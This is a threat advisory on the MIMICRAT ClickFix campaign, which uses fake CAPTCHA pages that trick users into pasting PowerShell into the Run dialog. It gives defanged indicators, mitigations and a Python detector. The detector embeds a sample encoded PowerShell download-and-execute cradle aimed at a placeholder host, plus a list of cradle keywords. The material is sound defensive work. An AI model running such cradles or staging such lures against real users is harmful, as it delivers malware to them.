MIMICRAT Campaign Uses Fake Verification Lure
Threat Group – Unknown financially motivated operators
Threat Type – Remote Access Trojan and social engineering campaign
Exploited Vulnerabilities – None; user-driven execution through abuse of the Windows Run dialog and PowerShell rather than a software vulnerability
Malware Used – MIMICRAT
Threat Score – 8.2 🔴 High
Last Threat Observation – February 2026, reported by multiple security research teams including Securonix and independent threat intelligence analysts
Overview
The MIMICRAT ClickFix campaign represents a sophisticated evolution of social engineering driven malware delivery. Rather than exploiting software vulnerabilities, this campaign manipulates users into executing malicious commands themselves through a fake CAPTCHA verification workflow. The technique abuses legitimate Windows functionality and leverages PowerShell to retrieve and execute payloads directly in memory.
The campaign has been observed targeting enterprise users across finance, technology, logistics, and government sectors. Its success relies heavily on deception and on user trust in familiar web interaction patterns. Victims encounter a malicious webpage that presents a fake verification prompt. Instead of completing a real CAPTCHA challenge, users are instructed to paste a command, already placed on their clipboard by the page, into the Windows Run dialog.
Once executed, the command downloads and runs the MIMICRAT payload, establishing persistence and enabling full remote access capabilities.
This technique significantly reduces reliance on traditional exploit chains and instead focuses on bypassing security awareness through psychological manipulation.
Key Details
Delivery Method
- Fake CAPTCHA prompt, known as the ClickFix technique
- Malicious website reached via phishing emails or compromised legitimate sites
- Clipboard injection with instructions directing users to execute PowerShell commands
Target
- Corporate users in enterprise Windows environments
- Finance and legal firms
- Technology providers
- Public sector organisations
Functions
- Establishes remote command execution capability
- Harvests credentials from browsers and memory
- Enables screen capture and keylogging
- Deploys secondary payloads including information stealers
- Maintains persistence via registry modification and scheduled tasks
Obfuscation
- The PowerShell payload is Base64 encoded
- Commands are split across variables to evade detection
- Execution occurs in memory to reduce file-based detection
- C2 infrastructure rotates domains frequently
Attack Vectors
The infection chain begins when a user visits a compromised or malicious website. The site displays a prompt stating that suspicious activity has been detected and requests verification.
Instead of presenting a legitimate CAPTCHA widget, the page displays instructions:
- Press Windows Key + R
- Paste the copied code
- Press Enter
The copied content contains a PowerShell command that retrieves a remote script. The script downloads the MIMICRAT loader, decrypts the embedded payload, and executes it directly in memory.
Once active, MIMICRAT initiates beaconing to its command and control server. It enumerates system information, checks for virtualisation environments, and begins credential harvesting routines.
Persistence mechanisms include:
- Registry Run keys
- Scheduled tasks
- WMI event subscriptions
The malware can then receive operator commands including file exfiltration, additional malware staging, and lateral movement attempts.
Known Indicators of Compromise
MimicRat Related Domains
- xmri[.]network
- investonline[.]in
- wexmri[.]cc
Related Hostnames
- www[.]investonline[.]in
- www[.]ndibstersoft[.]com
Associated IPv4 Addresses
- 45[.]13[.]212[.]250
Mitigation and Prevention
Mitigation Checklist
User Awareness
- Train users never to paste commands into the Run dialog or PowerShell from websites
Email Filtering
- Block phishing emails containing suspicious links
- Implement URL rewriting and sandbox detonation
Antivirus Protection
- Enable behavioural detection for PowerShell misuse
- Ensure endpoint detection and response telemetry is active
Two-Factor Authentication (2FA)
- Deploy MFA across all privileged and user accounts
Log Monitoring
- Monitor for unusual PowerShell invocation from user context
- Detect Base64 encoded command execution
Regular Updates
- Maintain updated endpoint security tools
- Patch browsers and operating systems
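The Log Monitoring items above, and the infection chain in Attack Vectors (Run dialog, PowerShell with a Base64-encoded command, in-memory stager), can be turned into a concrete triage check. The following is an added example written for this advisory, not tooling from any of the cited vendors: it parses constructed process-creation events in a simplified Sysmon-style key=value form, decodes any -EncodedCommand argument, and lists the signals that match the user-executed PowerShell pattern. The sample events, the stager text and the example.invalid URL are all made up for the example.

```python
import base64
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, flattened to key=value).
# The stager text and URL are placeholders made up for this example, not campaign indicators.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/verify')"
_ENC = base64.b64encode(_STAGER.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    # Run dialog launch: explorer.exe parent, hidden window, policy bypass, encoded command
    "ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    f"CommandLine=powershell -w hidden -ep bypass -enc {_ENC}",
    # Scheduled admin script started by a service: must not be flagged
    "ParentImage=C:\\Windows\\System32\\svchost.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "
    "CommandLine=powershell -File C:\\Scripts\\backup.ps1",
]
CRADLE_TERMS = ("iex", "invoke-expression", "downloadstring", "invoke-webrequest", "irm ", "iwr ")

def parse_event(line):
    """Split 'Key=value Key=value ...' into a dict; values may contain spaces."""
    return dict(re.findall(r"(\w+)=(.*?)(?=\s\w+=|$)", line))

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (Base64 of UTF-16LE) or None; -ep is not matched."""
    m = re.search(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def assess(event):
    """List the signals that match the user-executed PowerShell chain described above."""
    reasons = []
    cmd = event.get("CommandLine", "")
    if not event.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    if event.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("powershell-from-explorer")    # Run dialog / desktop launch, not a script host
    if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmd):
        reasons.append("hidden-window")
    if re.search(r"(?i)-e(?:xecutionpolicy|p)\s+bypass", cmd):
        reasons.append("execution-policy-bypass")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded-command")
        if any(t in decoded.lower() for t in CRADLE_TERMS):
            reasons.append("download-cradle")         # fetch-and-run stager, executed in memory
    return reasons
```

Two or more independent signals on one event (for example explorer.exe parent plus an encoded download cradle) is the threshold worth routing to an analyst; a single signal such as a hidden window is common in legitimate automation.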
Risk Assessment
The MIMICRAT ClickFix campaign scores 8.2 (High) due to its effectiveness, adaptability, and reliance on legitimate system tools. While it exploits no zero-day vulnerabilities, the campaign bypasses traditional exploit prevention controls and relies on precise social engineering.
The use of user executed PowerShell significantly reduces detection by signature based tools. Combined with rotating infrastructure and encrypted payload staging, it presents a credible enterprise risk.
Organisations without strong endpoint detection and behavioural monitoring may struggle to identify initial compromise.
The primary weakness of the campaign is its reliance on user interaction. Strong security awareness programs can significantly reduce infection rates.
Conclusion
The MIMICRAT ClickFix campaign demonstrates a growing shift toward user assisted malware deployment. Rather than breaching systems through technical exploits, threat actors are weaponising normal user workflows.
Organisations must prioritise behavioural monitoring, user training, and strict PowerShell execution controls. Disabling unnecessary scripting capabilities and enforcing application control policies will significantly reduce exposure.
This campaign reinforces a clear lesson: the human factor remains the most targeted attack surface in modern cybersecurity operations.
Sources
Elastic Security Labs – MIMICRAT ClickFix Campaign Delivers Custom RAT via Compromised Legitimate Websites – https://www.elastic.co/security-labs/mimicrat-custom-rat-mimics-c2-frameworks
Microsoft Security Blog – Think before you ClickFix: Analyzing the ClickFix social engineering technique – https://www.microsoft.com/en-us/security/blog/2025/08/21/think-before-you-clickfix-analyzing-the-clickfix-social-engineering-technique/
CERT Polska – ClickFix in action: how fake captcha can lead to a company compromise – https://cert.pl/en/posts/2026/02/fake-captcha-in-action/
The Hacker News – ClickFix Campaign Abuses Compromised Sites to Deploy MIMICRAT Malware – https://thehackernews.com/2026/02/clickfix-campaign-abuses-compromised.html
OTX AlienVault – Indicators of Compromise MIMICRAT ClickFix Campaign – https://otx.alienvault.com/pulse/699874fdcc7eaabe6bb130ac